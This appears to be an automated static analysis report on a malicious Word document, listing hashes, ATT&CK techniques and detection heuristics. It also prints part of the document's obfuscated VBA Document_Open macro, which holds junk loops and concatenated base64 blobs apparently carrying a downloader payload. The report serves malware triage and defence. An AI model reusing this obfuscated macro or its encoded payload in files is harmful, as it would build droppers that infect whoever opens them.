Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b25fd83e8f9e34a…

MALICIOUS

Office (OLE)

Size: 1.38 MB
Created: 2018-05-01 19:41:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: a5a0658edc3a48340679a94c80051b8a
SHA-1: 6bac79969a8eefd281b254b735c45b82ad9e5c21
SHA-256: 3b25fd83e8f9e34a4ee66ba78aade5cf75ae8643716dc3a736b258b48120b376
Risk Score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample contains a Document_Open macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. This is further supported by the presence of VBA p-code auto-execution with execution tokens. The macro's obfuscated nature and the presence of a long encoded blob suggest it is designed to download and execute a second-stage payload, characteristic of a downloader malware.

Heuristics 7

  • VBA macros detected (severity: medium; 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro (severity: high) [OLE_VBA_DOCOPEN]
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Excel 4.0 (XLM) macro sheet present (severity: medium) [OLE_XLM_AUTOOPEN]
    Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact (severity: info) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 59408 bytes
SHA-256: e09dd843fbe2255fd3e9361c64e51a7baa89f8232333d4ea94738931ddfab321
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim gYcRJb
gYcRJb = 165
While gYcRJb < 871
gYcRJb = gYcRJb + 38
Wend
cezrcExD = 19944
rnmrZ = yK2Y5ZOM8 & gYcRJb
If 78 + 123 = 19650 / 1310 Then
aYI1Nv = "ALzgH"
End If
ykMStc9i = "DXOxr2Zc"
cLEY2S4NI = aYI1Nv & ykMStc9i
Dim RtfQK
RtfQK = 165
While RtfQK <= 871
RtfQK = RtfQK + 38
Wend
ozUXSY3s = 19944
Z6Qqk3dF7 = gSgQDWTyv & RtfQK
If 78 + 123 = 19650 / 1310 Then
UBL6tS = "lq1D8"
End If
TJl7UQPd = 19944
HPy4tv = UBL6tS & TJl7UQPd
If 26356 / 44 = 1696 - 1680 Then
SMWVZO = "jlcKx"
End If
gsLqGxrV = "bWlCT6"
vKhp5nJ = SMWVZO & gsLqGxrV
If 26356 / 44 = 1696 - 1680 Then
zZlqbxWgM = "azNGeQCDj"
End If
LDnICL = 35453
LAP84mrNY = zZlqbxWgM & LDnICL
Dim kyRSsP2UC
kyRSsP2UC = 2
While kyRSsP2UC <= 355
kyRSsP2UC = kyRSsP2UC + 19
Wend
Z94OZ = "o8TGin"
stSJAd = UyIWPm & kyRSsP2UC
Dim nPE6dujW8
nPE6dujW8 = 2
While nPE6dujW8 < 355
nPE6dujW8 = nPE6dujW8 + 19
Wend
g8m74xo = "N8Skt"
IyGwv9 = VOFKQe5IX & nPE6dujW8
If 52 * 9 = -1002 + 1017 Then
rBLhj8 = "TOAwj6"
End If
gRqJm = 29947
MKWdV3L = rBLhj8 & gRqJm
ktxhPmp4 = "a3VkbVZ5YzJsdmJqc2thMkZ"
YdimkHO = "6YW5KT1Z6Z2dQU0FuYlU5c2RtbElNV1psSnpza2QyMTZNbTR1YUdWaFpHVnljMXNuZFhObGNp"
CLjWxAH = "MWhaMlZ1ZENkZElEMGdKRWxMV2psMFJXTTdKSE5pVTFCNk1tY2dQU0FuWVZKTlp6TW5PeVJKUzFvNWRFVmpMbU5zYjNObEtDazdKSE0zWTNOTklEMGdKMjFWWlZaa0p6c2tTVXRhT1hSRll5NXhkV2wwT3lSTlZtUlhieUE5SUNkWG"
yC9HiOL = "FHZHllSEZWSnpza1duQllVWEY2Y3lBOUlDUm"
Dim WNLHGVIQv
WNLHGVIQv = 223
While WNLHGVIQv <= 359
WNLHGVIQv = WNLHGVIQv + 13
Wend
rz1bea2yj = "IYCmiOgX"
Nkxr8MHOR = yKTh5 & WNLHGVIQv
If 826 + 37 = -5511 + 5512 Then
y2g8WFnC = "FaD2ktr"
End If
NnABWz = 42991
rK59xtRUr = y2g8WFnC & NnABWz
Dim MsYdOxP3
MsYdOxP3 = 223
While MsYdOxP3 <= 359
MsYdOxP3 = MsYdOxP3 + 13
Wend
d58a40l = "lpuXf"
BE6lz0Y = KiNn5EF & MsYdOxP3
Dim fW2mkbN
fW2mkbN = 223
While fW2mkbN < 359
fW2mkbN = fW2mkbN + 13
Wend
cIo7Wes = "OCTWtFUN9"
jauD3Qo2 = EAr9FCsI & fW2mkbN
Dim BzrM2nmp
BzrM2nmp = 83
While BzrM2nmp < 361
BzrM2nmp = BzrM2nmp + 24
Wend
icBKsG4 = "y8QMHdyWU"
fgpyXCPd = Zo4LdZY52 & BzrM2nmp
Dim i3CXeDBT
i3CXeDBT = 83
While i3CXeDBT < 361
i3CXeDBT = i3CXeDBT + 24
Wend
aOrAiqRt = 28101
zpIrQ = JCjvwhn & i3CXeDBT
If 61 + 131 = 10450 / 950 Then
iN1azt = "Xdj0ZF"
End If
dxM7CgR = "irNREBHm"
hxzfiN = iN1azt & dxM7CgR
Dim SFAKT7cQe
SFAKT7cQe = 27
While SFAKT7cQe <= 378
SFAKT7cQe = SFAKT7cQe + 22
Wend
nzYlK = 48852
zbfkRAQ7 = Z6tm8RhQ & SFAKT7cQe
If 61 + 131 = 10450 / 950 Then
PIUSLvn = "wNOQy40C"
End If
JtJWsbU = "qf9LlVT"
xmQF5fp2 = PIUSLvn & JtJWsbU
If 38 < 236 Then
' dZHtJu
Else
' BuNrl4M
MsgBox "WFy12uReG"
End If
If 833 - 13 = 24970 / 4994 Then
FCVc8i6E = "wCV8hI4js"
End If
wFAvxr = "o7hfi6c9"
Nr4Td3p = FCVc8i6E & wFAvxr
If 833 - 13 = 24970 / 4994 Then
Xmylws = "xc8y0P73"
End If
H2FdCpDHq = 60726
nx6W2yF = Xmylws & H2FdCpDHq
Dim wuR7v
wuR7v = ktxhPmp4 & YdimkHO & CLjWxAH & yC9HiOL
o97oaKG = "kzUW5PeVIzYlhveW"
SI2lAhQNf = "JpNUViM2R1Ykc5aFpFWnBiR1VvSkZCNlZuWlFSazFDVnk1VWIxTjBjbWx1WnlncExDQWtXbkJZVVhGNmN5azdKRnAxYzB4SlJXY2dQU0FuVFhadlYyTlVVU2M3VTNSaGNuUXRVSEp2WTJWemN5QWtXbkJZVVhGNmN6c2tiVTVXYjNZM0lEMGdKMU5UWTBSV1MyUW5P"
a3uOS = "Mkp5WldGck8zMWpZWFJqYUhza1psQmpSMnBrSUQwZ0oyNVVNbEZhVnljN2ZTU"
XgsZB5 = "nZjVzF5VWtOTVZVa2d"
ezMbmZ = "QU0FuV2tONWREWW5PMzA9"
If 997 - 9 = -1905 + 1919 Then
gcy547Sk = "WXYc2iHKO"
End If
LncNY = "gInqVpZR"
YBnp1y = gcy547Sk & LncNY
If 18 < 129 Then
' Shl8cI
Else
' VysnxYV
MsgBox "CQulK7mn"
End If
If 62 < 216 Then
' nEWwfL3i
Else
' MxcyHU
MsgBox "v6lt9ar"
End If
If 62 < 216 Then
' nXlFRbgAG
Else
' eSzLN
MsgBox "Q29sb"
End If
If 547 - 17 = 20 - 8 Then
bHx0hv = "XHvfW5by"
End If
FPhdDS = "u5jA7n"
nzvCBYpI = bHx0hv & FPhdDS
Dim IPSYL6
IPSYL6 = 47
While IPSYL6 < 291
IPSYL6 = I
... (truncated)